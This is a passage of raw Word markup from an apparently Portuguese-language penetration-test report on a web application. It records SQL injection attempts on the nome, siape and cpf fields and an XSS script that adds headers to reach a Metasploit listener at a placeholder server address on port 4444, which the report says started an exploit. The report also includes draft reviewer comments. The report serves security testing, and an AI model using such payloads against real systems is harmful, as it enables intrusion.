            <wp:docPr id="42" name="Imagem 4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467" cy="370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3D141C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Figura 27 – Dados da requisição via POST capturada pelo Burp Suite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D141C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Resultad</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">o: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Não passou no teste. Os parâmetros “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>nome</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”, “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>siape</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>” e “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>cpf</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>” não são injetáveis conforme mostram as figuras 28, 29 e 30.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003D141C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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33E5E53C" wp14:editId="1597F2C2">
            <wp:extent cx="4796287" cy="3659270"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="41" name="Imagem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66" cy="36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A9523B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A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 28 - Resultado tentativa de Injeção SQL no campo </w:t>
      </w:r>
      <w:r w:rsidRPr="00A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidRPr="00A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000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0148CCA7" wp14:editId="60DFE3C7">
            <wp:extent cx="4825339" cy="3562709"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40" name="Imagem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78" cy="356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A9523B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A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 29 - Resultado tentativa de Injeção SQL no campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Siape.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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08324395" wp14:editId="0B57547E">
            <wp:extent cx="4968815" cy="3703877"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="39" name="Imagem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28" cy="370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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 30 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado tentativa de Injeção SQL no campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>CPF.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7"/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lastRenderedPageBreak/>
        <w:t>Iteração 5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5.1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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Servidor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00E5241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Tarefa realizada dia </w:t>
      </w:r>
      <w:r w:rsidR="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>19/05/16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/>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/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</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> o campo de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448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</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> para </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">tentar </w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>incluir um script malicioso que consiga burlar o filtro CORS e realiza</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>r uma chamada a um listener do M</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">estasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>para executar um ataque usando M</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>eterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="009A7448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Resultados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7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Tentativa 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC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Para burlar o filtro CORS, do navegador é necessário que sejam incluídas algumas credenciais no cabeçalho da requisição. O script abaixo simula uma tentativa de requisição credenciada por meio do atributo “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>withCredencials”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>É esperado que a aplicação impeça a conexão.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E5241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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A7448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&lt;script&gt;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9EE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8A79EE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(); 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http://IP_do_servidor:4444’,false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505050"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E1E7FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>withCredentials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= true;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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r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.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008719F1" w:rsidRDefault="008C6DC7" w:rsidP="008719F1">
      <w:pPr>
        <w:ind w:left="2124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</w:pPr>
      <w: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 w:rsidR="008719F1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8C6DC7" w:rsidRPr="008719F1" w:rsidRDefault="008C6DC7" w:rsidP="008719F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  <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Passou no teste. O comando </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“withCredentials” </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontra-se depreciado e a conexão não ocorreu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7"/>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="30512371" wp14:editId="33C96C56">
            <wp:extent cx="5731200" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24" name="image03.jpg" descr="XSS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 descr="XSS1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Pr="008719F1" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 31 – </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:t xml:space="preserve">Console do navegador indicando a deprecianção do atributo </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>“withCredencials”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7"/>
    <w:p w:rsidR="008C6DC7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FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tentativa 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008719F1" w:rsidRDefault="008719F1" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="2124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burlar o filtro CORS, deve ser adicionado ao cabeçalho da requisição uma instrução que simule uma assinatura válida para o navegador. Para esse fim, foi utilizado a instrução “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">setRequestHeader” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para adicionar as credenciais maliciosas ao cabeçalho.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00FF400C" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF400C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&lt;script&gt;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9EE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8A79EE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(); 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http://IP_do_servidor:4444’,false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setRequestHeader(“</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="353528"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFAF6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Origin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”,”*”);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r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.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="2124"/>
      </w:pPr>
      <w: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8C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00FF400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FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Conforme 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figura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32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> e 33</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> requisição foi</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> bem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>sucedida e o Metasploit conseguiu</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> iniciar o exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="514DE141" wp14:editId="33C7556D">
            <wp:extent cx="5731200" cy="2120900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="image05.jpg" descr="XSS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 descr="XSS2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Pr="00FF400C" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Figura 32 –</w:t>
      </w:r>
      <w:r w:rsidR="00E52417">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Console do navegador indicando a conexão.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7"/>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="01251623" wp14:editId="06CEE089">
            <wp:extent cx="3600450" cy="1323975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="image02.jpg" descr="XSS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 descr="XSS3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Pr="00FF400C" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Figura 33</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exploit inciado com sucesso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/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5.2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Pr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mapeamento de vulnerabilidades – Tela Relatórios</w:t>
      </w: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 w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tarefa realizada dia 24/05/16</w:t>
      </w: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  <w:t>Duração: 15 minutos.</w:t>
      </w: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</w:rPr>
      </w:pP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  <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="2124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Utilizar o Burp Suite para descobrir as vulnerabilidades existentes na tela Relatório e indicar as possíveis técnicas que devem ser utilizadas </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para explorar as vulnerabilidades encontradas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pP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  <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Resultados obtidos no momento de gerar um relatório dos dados cadastrados no sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2136"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[EXPLICAR O QUE FOI FEITO DE FORMA BREVE]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008719F1" w:rsidRDefault="008719F1" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2136"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008719F1" w:rsidRPr="008719F1" w:rsidRDefault="008719F1" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2136"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D62225">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Não tem explicação por que fora utilizar o burp suíte e ir até a transação, não teve nenhum passo adicional ou nada significativo pra ser descrito.</w:t>
      </w:r>
      <w:r w:rsidR="00D62225" w:rsidRPr="00D62225">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Eu só acessei as transações e vi que era tudo estático.</w:t>
      </w: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Pr="003E38DF" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E38DF">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49889481" wp14:editId="17B5E8B4">
            <wp:extent cx="4643003" cy="3233501"/>
            <wp:effectExtent l="0" t="0" r="5715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latorio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10" cy="32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8719F1" w:rsidRDefault="008C6DC7" w:rsidP="008719F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Figura 34- Burp Suite utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Relatório.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De acordo com o Burp Suite, a página não recebe nenhum parâmetro </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>pois todos os dados disponíveis da aplicação são trazidos direto da base de dados para a tela</w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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  <w:color w:val="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Quando </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>se utiliza os campos de filtros na tela, não há requisição, pois a aplicação usa os dados</w:t>
      </w:r>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> carregados para filtrar os dados </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>que serão exibidos no relatório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  <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Mediante a esse contexto, não foram encontradas vulnerabilidades que pudessem ser exploradas.</w:t>
      </w:r>
      <w:r w:rsidRPr="00015DE3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  <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008719F1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  <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>Resultados obtidos no momento de gerar uma impressão para um relatório:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pP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Pr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D44911A" wp14:editId="0A7F67CB">
